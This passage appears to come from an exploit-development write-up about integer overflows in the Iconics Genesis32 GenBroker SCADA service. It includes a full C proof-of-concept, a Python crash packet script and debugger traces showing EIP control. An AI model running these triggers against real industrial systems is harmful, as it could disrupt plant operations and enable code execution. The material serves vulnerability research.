Each exploit for a vulnerability listed in the top 5 list was worth USD $500, the other 25 exploits were worth USD $100 each. The deadline to submit a functional Metasploit module, bypassing ASLR and DEP where applicable, was set to July 20th.<\/p>\n
Sounds like fun, so I decided to give it a try and claimed one of the vulnerabilities from the top 25 list.<\/p>\n
The bounty contest is now closed<\/a> , so I decided to share my version of the \"code, sweat and tears\" that were required to produce a reliable exploit.<\/p>\n <\/p>\n The challenge I selected is based on a series of vulnerabilities<\/a> (13! advisories) discovered by Luigi Auriemma, in Iconics Genesis32 (<= 9.21) and Genesis64 (<= 10.51). For the record, my exploit targets Genesis32. The Iconics website states :<\/p>\n For 32-bit platforms, ICONICS is committed to providing product improvements and added functionality to the GENESIS32 suite of HMI\/SCADA and advanced visualization solutions for many years to come. With GENESIS32 and GENESIS64, ICONICS connects your plant-level operations to the enterprise, turning your real-time data into competitive advantage.<\/em><\/p>\n Genesis is a HMI (Human Machine Interface) application, typically used to visualize data and provide a GUI to operators to monitor and manage various processes.<\/p>\n The advisory reports that the GenBroker service, running on tcp port 38080, is vulnerable to an integer overflow during the handling of opcodes 3f0, 138F,1390,1391,1392,1393,1394, 1C86, 89a,89b, 450,451,454,455, 1C20,1C24.<\/p>\n According to some of the report, when using a specially crafted packet, you can influence the size of a memory allocation needed for the creation of an array, resulting in memory corruption.<\/p>\n <\/p>\n Let's take a quick look at the vulnerable code in one of the advisories<\/a>:<\/p>\n Apparently no check is performed on the value read from the packet before multiplying it and using it as an argument to malloc() functions. This leads to memory corruption, which can lead to code execution. Up to me to prove that code execution is possible and reliable.<\/p>\n <\/p>\n One of the most heard comment from other msf bounty hunters was that it didn\u2019t seem to be trivial to obtain a copy of the vulnerable version of the application (or even \u2018a\u2019 copy of the application for that matter), my case was no exception. But luckily, I was able to get my hands on it, and managed to perform a default installation on my VM.<\/p>\n The installer drops files in 3 locations :<\/p>\n During the installation, I was prompted to either select an existing administrator user or to create a new one (ICONICS_USER) and have it added automatically to the administrators group. This account is used to run the genbroker.exe service.<\/p>\n <\/p>\n The advisory contains a link to a zip file<\/a>, which contains the following source code, providing poc packets for 12 cases :<\/p>\n The code provides a PoC overflow for 12 cases. I tried running each case & observed the crashes for each of the cases :<\/p>\n Based on my observations, I decided to start working on the packet produced by case 3, because it gave us direct control over EIP, we could see pointers to our payload on the stack, and we have at least one register pointing into the payload. Although case 12 also would provide us with direct control over EIP, there are less obvious pointers to payload on the stack.<\/p>\n Summarizing case 3, the packet would need to contain the following specifications.<\/p>\n Although the POC code contained a \"heap spray\" (basically sending a bunch of packets with A's prior to sending the 'kill' packet), I discovered that loading the payload inside the kill packet allows us to access that payload as well.<\/p>\n A basic python script to reproduce this case, based on sniffing traffic, looks like this :<\/p>\n As explained before, after throwing this packet to the GenBroker.exe service, we call MFC71U.ATL::CSimpleStringT() at 0x7c274B92 and then end up executing 0x7c274BF8 (MFC71U.CAfxStringMgr::Allocate())<\/p>\n After 4 allocations, the code ends up running a routine at 7c25D069 (see later) 2 times.<\/p>\n Next, another series of allocations are made. During the second attempt, in MFC71U.ATL::CSimpleStringT(), we notice that we try to call a function at [EAX+10].<\/p>\n EAX+10 points into a vtable inside mfc71u.dll (contents during normal operation) :<\/p>\n vtable :<\/p>\n Using our simple packet, using 10000 A's as payload, we seem to have overwritten the pointer to the vtable (EAX) with unicode \"AA\" (part of our payload). At EAX+10 we see \"CC CC CC CC\" (see dump window in the lower left half of the screen)<\/p>\n Obviously, this call leads to EIP control :<\/p>\n That's good enough \ud83d\ude42<\/p>\n We managed to control EIP and we can see pointers to our payload on the stack. The advisory also explains that there are many ways to trigger corruption, and maybe changing the payload itself (10000 A's in our case) will change the flow of the application too.<\/p>\n So it appears we own some part of the program\u2026but can we make it further than this?<\/p>\n Something's to consider is our pointer is in unicode (EAX = 00410041), which will considerably shrink the amount of pointers we have available to use. Not only are we limited in our selection but we essentially need to find a pointer to a pointer, because EAX is populated by reading ECX earlier on<\/p>\n Since we are calling the data segment of a pointer we are loading the op code or bytes at that location into EIP.<\/p>\n Lets look at that more in detail using an sample pointer (one that we put in ourselves at runtime). Besides the fact that our 'test' pointer is not unicode we will use it simply for an example to see what EIP will look like after the call [EAX + 10] is made.<\/p>\n If we use a pointer at 0x0041AAD5, it will lead to \u201cADD ESP, 0C # RETN\u201d.<\/p>\n If we subtract 0x10 from that pointer (to compensate for EAX + 10) we are left with 0x0041AAC5.<\/p>\n Let\u2019s go ahead and rerun our code and put a break point at the call (bp at 7C274BAC). Then we will change EAX into 0x0041AAC5 and execute the call.<\/p>\n DS:[0041AAD5]=C30CC483<\/p>\n If we look at the picture we can see that instead of our \u201cADD ESP, 0C # RETN\u201d we landed at the opcode or bytes of that pointer. If we take into account the little endian of our bytes we see that \\xc3\\x0c\\xc4\\x83\u201d, which is the opcode for the \"add esp,0c\/retn\" gadget has become our pointer! So we need to keep this into consideration when we begin looking for a pointer that we will need to use for the call. It basically means we need to find a pointer to the pointer.<\/p>\n Also : since we control what is being copied over, perhaps we might be able to find different flows that lead us to different calls.<\/p>\n Before we move any further lets go ahead and look at our modules, basically enumerating what is available to us when looking for pointers.<\/p>\n <\/p>\nVulnerability<\/h2>\n
Initial discovery<\/h3>\n
The vulnerable function<\/h3>\n
0044AC26 |. E8 45C5FCFF CALL 00417170 ; get 32bit\n0044AC2B |. 8B45 00 MOV EAX,DWORD PTR SS:[EBP]\n0044AC2E |. C1E0 02 SHL EAX,2 ; * 4\n0044AC31 |. 50 PUSH EAX\n0044AC32 |. E8 81C50500 CALL <JMP.&MFC71U.#265> ; malloc<\/span>\n...\n0044AC95 |. 8B47 28 MOV EAX,DWORD PTR DS:[EDI+28]\n0044AC98 |. C1E0 02 SHL EAX,2 ; * 4\n0044AC9B |. 50 PUSH EAX\n0044AC9C |. C74424 20 020>MOV DWORD PTR SS:[ESP+20],2\n0044ACA4 |. E8 0FC50500 CALL <JMP.&MFC71U.#265> ; malloc<\/span>\n...\n0044ACE9 |> 8B47 30 MOV EAX,DWORD PTR DS:[EDI+30]\n0044ACEC |. C1E0 02 SHL EAX,2 ; * 4\n0044ACEF |. 50 PUSH EAX\n0044ACF0 |. E8 C3C40500 CALL <JMP.&MFC71U.#265> ; malloc<\/span><\/pre>\nObtaining & installing the software<\/h3>\n
\n
![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/07\/image_thumb13.png\")
<\/a><\/p>\n![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/07\/image_thumb14.png\")
<\/a><\/p>\nPoC - triggering the overflow<\/h3>\n
\/* by Luigi Auriemma *\/<\/span>\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdint.h>\n#include <time<\/span>.h>\n\n#ifdef WIN32\n #include <winsock.h>\n #include \"winerr.h<\/span>\"\n\n #define close<\/span> closesocket\n #define sleep Sleep\n #define ONESEC 1000\n#else<\/span>\n #include <unistd.h>\n #include <sys\/socket.h>\n #include <sys\/types.h>\n #include <arpa\/inet.h>\n #include <netinet\/in.h>\n #include <netdb.h>\n\n #define ONESEC 1\n#endif\n\ntypedef<\/span> uint8_t u8;\ntypedef<\/span> uint16_t u16;\ntypedef<\/span> uint32_t u32;\n\n#define VER \"0.1<\/span>\"\n#define PORT 38080\n#define BUFFSZ 0x2000 \/\/ 0x4000 is the max but 0x2000 seems more compatible<\/span>\n\nint<\/span> send_gen(int<\/span> sd, int<\/span> type, u8 *data, int<\/span> datasz);\nint<\/span> putss(u8 *data, u8 *str);\nint<\/span> putmm(u8 *data, u8 *str, int<\/span> size);\nint<\/span> putcc(u8 *data, int<\/span> chr, int<\/span> size);\nint<\/span> putxx(u8 *data, u32 num, int<\/span> bits);\nint<\/span> timeout(int<\/span> sock, int<\/span> secs);\nu32 resolv(char<\/span> *host);\nvoid<\/span> std_err(void<\/span>);\n\nint<\/span> main(int<\/span> argc, char<\/span> *argv[]) {\n struct<\/span> linger ling = {1,1};\n struct<\/span> sockaddr_in peer;\n int<\/span> sd,\n i,\n bug,\n type;\n u16 port = PORT;\n u8 *host,\n *buff,\n *fill,\n *p,\n *f;\n\n#ifdef WIN32\n WSADATA wsadata;\n WSAStartup(MAKEWORD(1,0), &wsadata);\n#endif\n\n setbuf(stdout, NULL);\n\n fputs(\"\\n<\/span>\"\n \"GenBroker <= 9.21.201.01 multiple integer overflows <\/span>\"VER\"\\n<\/span>\"\n \"by Luigi Auriemma\\n<\/span>\"\n \"e-mail: aluigi@autistici.org\\n<\/span>\"\n \"web: aluigi.org\\n<\/span>\"\n \"\\n<\/span>\", stdout);\n\n if<\/span>(argc < 3) {\n printf<\/span>(\"\\n<\/span>\"\n \"Usage: %s <bug> <host> [port(%d)]\\n<\/span>\"\n \"\\n<\/span>\"\n \"Bugs:\\n<\/span>\"\n \" refer to the relative advisories for the available numbers\\n<\/span>\"\n \" and what vulnerabilities they test\\n<\/span>\"\n \"\\n<\/span>\", argv[0], port);\n exit<\/span>(1);\n }\n\n bug = atoi<\/span>(argv[1]);\n host = argv[2];\n if<\/span>(argc > 3) port = atoi<\/span>(argv[3]);\n\n peer.sin_addr.s_addr = resolv(host);\n peer.sin_port = htons(port);\n peer.sin_family = AF_INET;\n\n printf<\/span>(\"- target %s : %hu\\n<\/span>\", inet_ntoa(peer.sin_addr), port);\n\n buff = malloc<\/span>(BUFFSZ);\n if<\/span>(!buff) std_err();\n\n p = buff;\n switch<\/span>(bug) {\n case<\/span> 1: {\n type = 0x89a;\n p += putxx(p, 0, 32);\n p += putxx(p, 0x2000, 16);\n p += putxx(p, 0x20000001, 32);\n p += putxx(p, 0, 32);\n break<\/span>;\n }\n case<\/span> 2: {\n type = 0x453;\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 16);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n case<\/span> 3: {\n type = 0x4b0;\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n case<\/span> 4: {\n type = 0x4b2;\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n case<\/span> 5: {\n type = 0x4b5;\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putxx(p, 0, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n case<\/span> 6: {\n type = 0x7d0;\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putxx(p, 0, 32);\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n case<\/span> 7: {\n type = 0xDAE;\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n case<\/span> 8: {\n type = 0xfa4;\n p += putxx(p, 0x20000001, 32);\n break<\/span>;\n }\n case<\/span> 9: {\n type = 0xfa7;\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n case<\/span> 10: {\n type = 0x1bbc;\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putxx(p, 0, 32);\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n case<\/span> 11: {\n type = 0x1c84;\n p += putss(p, NULL);\n p += putss(p, NULL);\n p += putxx(p, 0, 32);\n p += putxx(p, 0x10000001, 32);\n break<\/span>;\n }\n case<\/span> 12: {\n type = 0x26AC;\n p += putxx(p, 0x40000001, 32);\n break<\/span>;\n }\n default<\/span>: {\n printf<\/span>(\"\\nError: invalid bug number %d\\n<\/span>\", bug);\n exit<\/span>(1);\n break<\/span>;\n }\n }\n\n p += putcc(p, 0x41, BUFFSZ - (p - buff)); \/\/ good as string size too<\/span>\n \/\/ send_gen automatically adjusts the size to 0x1ff4<\/span>\n\n \/\/ the following part is not needed so can be removed<\/span>\n printf<\/span>(\"- heap spray packets: <\/span>\");\n fill = malloc<\/span>(BUFFSZ);\n if<\/span>(!fill) std_err();\n f = fill;\n f += putxx(f, 340, 32);\n f += putss(f, \"parameter<\/span>\");\n f += putss(f, \"value<\/span>\");\n for<\/span>(i = 0; i < 340; i++) {\n f += putss(f, \"AAAA<\/span>\");\n f += putss(f, \"AAAA<\/span>\");\n f += putxx(f, 0x41414141, 32);\n f += putxx(f, 0x41414141, 32);\n f += putxx(f, 0x41414141, 32);\n }\n for<\/span>(i = 0; i < 20; i++) {\n fputc('.', stdout);\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n if<\/span>(sd < 0) std_err();\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char<\/span> *)&ling, sizeof<\/span>(ling));\n if<\/span>(connect(sd, (struct<\/span> sockaddr *)&peer, sizeof<\/span>(struct<\/span> sockaddr_in)) < 0) std_err();\n send_gen(sd, 0x4b2, fill, f - fill);\n close<\/span>(sd);\n }\n printf<\/span>(\"\\n<\/span>\");\n\n printf<\/span>(\"- malformed packets: <\/span>\");\n for<\/span>(i = 0; i < 10; i++) {\n fputc('.', stdout);\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n if<\/span>(sd < 0) std_err();\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char<\/span> *)&ling, sizeof<\/span>(ling));\n if<\/span>(connect(sd, (struct<\/span> sockaddr *)&peer, sizeof<\/span>(struct<\/span> sockaddr_in)) < 0) std_err();\n send_gen(sd, type, buff, p - buff);\n close<\/span>(sd);\n }\n printf<\/span>(\"\\n<\/span>\");\n\n printf<\/span>(\"- done\\n<\/span>\");\n return<\/span>(0);\n}\n\nint<\/span> send_gen(int<\/span> sd, int<\/span> type, u8 *data, int<\/span> datasz) {\n static<\/span> u8 buff[BUFFSZ];\n static<\/span> int<\/span> pck = 1;\n int<\/span> t;\n u8 *p;\n\n t = 4 + 4 + 4 + datasz;\n if<\/span>(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\n\n p = buff;\n p += putxx(p, 1, 16);\n p += putxx(p, htons(pck++), 16);\n p += putxx(p, htonl(1), 32);\n p += putxx(p, htonl(t), 32);\n\n p += putxx(p, 1, 32);\n p += putxx(p, 0, 32);\n p += putxx(p, type, 32);\n if<\/span>(datasz > 0) p += putmm(p, data, datasz);\n\n if<\/span>(send(sd, buff, p - buff, 0) < 0) return<\/span>(-1);\n return<\/span>(0);\n}\n\nint<\/span> putss(u8 *data, u8 *str) {\n int<\/span> len;\n u8 *p;\n\n len = 0;\n if<\/span>(str) len = strlen(str);\n\n p = data;\n if<\/span>(len < 0xff) {\n p += putxx(p, len, 8);\n } else<\/span> {\n p += putxx(p, 0xff, 8);\n p += putxx(p, len, 16);\n }\n p += putmm(p, str, len);\n return<\/span>(p - data);\n}\n\nint<\/span> putmm(u8 *data, u8 *str, int<\/span> size) {\n if<\/span>(size < 0) size = strlen(str);\n memcpy(data, str, size);\n return<\/span>(size);\n}\n\nint<\/span> putcc(u8 *data, int<\/span> chr, int<\/span> size) {\n memset(data, chr, size);\n return<\/span>(size);\n}\n\nint<\/span> putxx(u8 *data, u32 num, int<\/span> bits) {\n int<\/span> i,\n bytes;\n\n bytes = bits >> 3;\n for<\/span>(i = 0; i < bytes; i++) {\n \/\/data[i] = num >> ((bytes - 1 - i) << 3);<\/span>\n data[i] = num >> (i << 3);\n }\n return<\/span>(bytes);\n}\n\nint<\/span> timeout(int<\/span> sock, int<\/span> secs) {\n struct<\/span> timeval tout;\n fd_set fd_read;\n\n tout.tv_sec = secs;\n tout.tv_usec = 0;\n FD_ZERO(&fd_read);\n FD_SET(sock, &fd_read);\n if<\/span>(select(sock + 1, &fd_read, NULL, NULL, &tout)\n <= 0) return<\/span>(-1);\n return<\/span>(0);\n}\n\nu32 resolv(char<\/span> *host) {\n struct<\/span> hostent *hp;\n u32 host_ip;\n\n host_ip = inet_addr(host);\n if<\/span>(host_ip == INADDR_NONE) {\n hp = gethostbyname(host);\n if<\/span>(!hp) {\n printf<\/span>(\"\\nError: Unable to resolv hostname (%s)\\n<\/span>\", host);\n exit<\/span>(1);\n } else<\/span> host_ip = *(u32 *)hp->h_addr;\n }\n return<\/span>(host_ip);\n}\n\n#ifndef WIN32\n void<\/span> std_err(void<\/span>) {\n perror(\"\\nError<\/span>\");\n exit<\/span>(1);\n }\n#endif<\/pre>\n\n
\n
#!\/usr\/bin\/python\n# lincoln - lincoln@corelan.be\n#\nimport<\/span> socket,sys<\/span>,struct\n\nheader = \"\\x01\\x00\\x00\\x1e\\x00\\x00\\x00\\x01\\x00\\x00\\x1f\\xf4\\x01<\/span>\"\nheader += \"\\x00<\/span>\" * 7\nopcode = \"\\xb0\\x04<\/span>\"\nheader2 = \"\\x00<\/span>\" * 36\nheader3 = \"\\x01\\x00\\x00\\x40<\/span>\"\n\nbuffer = \"A<\/span>\" * 10000\n\npayload = header + opcode + header2 + header3 + buffer\n\ndef<\/span> sploit():\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect(('127.0.0.1', 38080))\n\tprint<\/span> \"[+] Kill packet sent!\\n<\/span>\"\n\ts.send(payload)\n\ts.close<\/span>()\n\nif<\/span> __name__ == '__main__<\/span>':\n try:\n sploit()\n except:\n print<\/span> \"error<\/span>\"\n sys<\/span>.exit<\/span>(0)<\/pre>\nMFC71U!ATL::CSimpleStringT<wchar_t,1>::Fork+0x1a:\n7c274bac ff5010 call dword ptr [eax+10h]\n ds:0023:7c26a150={MFC71U!CAfxStringMgr::Clone (7c274b57)}\n0:005> ln eax+10\n(7c26a140) MFC71U!CAfxStringMgr::`vftable'+0x10 |\n (7c26a154) MFC71U!CAfxStringMgr::`RTTI Complete Object Locator'<\/pre>\n7c274bf8 : mfc71u!CAfxStringMgr::Allocate()\n7c27c9b2 : mfc71u!CAfxStringMgr__Free()\n7c27dc90 : mfc71u!CAfxStringMgr__Reallocate()\n7c274b49 : mfc71u!CAfxStringMgr::GetNilString()\n7c274b57 : mfc71u!CAfxStringMgr::Clone()<\/pre>\n
![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/07\/image_thumb12.png\")
<\/a><\/p>\n![\"image\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/07\/image_thumb11.png\")
<\/a><\/p>\n7C274B99 . 8B31 MOV ESI,DWORD PTR DS:[ECX]\n7C274B9B . 8B5E F4 MOV EBX,DWORD PTR DS:[ESI-C]\n7C274B9E . 83EE 10 SUB ESI,10\n7C274BA1 . 894D F8 MOV DWORD PTR SS:[EBP-8],ECX\n7C274BA4 . 8B0E MOV ECX,DWORD PTR DS:[ESI]\n7C274BA6 . 8B01 MOV EAX,DWORD PTR DS:[ECX]\n7C274BA8 . 57 PUSH EDI\n7C274BA9 . 895D FC MOV DWORD PTR SS:[EBP-4],EBX\n7C274BAC . FF50 10 CALL DWORD PTR DS:[EAX+10]<\/pre>\n
![\"pic2\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/07\/pic2_thumb.jpg\")
<\/a><\/p>\nAnalysis<\/h2>\n
Module analysis, safeseh, rebase<\/h3>\n
![\"pic3\"](\"https:\/\/www.corelan.be\/wp-content\/uploads\/2011\/07\/pic3_thumb.jpg\")
<\/a><\/p>\n